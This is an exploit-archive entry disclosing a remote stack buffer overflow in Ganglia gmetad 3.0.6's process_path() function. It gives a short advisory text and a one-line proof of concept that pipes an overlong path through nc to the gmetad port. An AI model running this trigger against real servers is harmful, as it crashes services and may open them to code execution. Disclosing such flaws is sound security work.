Lucene search

K
exploitpackSpike SpiegelEXPLOITPACK:209E47D548FA7F20B245F08DC4A206AE
HistoryJan 15, 2009 - 12:00 a.m.

Ganglia gmetad 3.0.6 - process_path() Remote Stack Buffer Overflow

2009-01-1500:00:00
Spike Spiegel
7

Ganglia gmetad 3.0.6 - process_path() Remote Stack Buffer Overflow

source: https://www.securityfocus.com/bid/33299/info

Ganglia is prone to a remote stack-based buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied input.

Attackers can leverage this issue to execute arbitrary code in the context of the application. Successful exploits will compromise the application and the underlying computer. Failed attacks will cause denial-of-service conditions.

echo "/`python -c \"print \\"%s/%s\\" % ('a'*300,'b'*300)\"`" |nc localhost 8652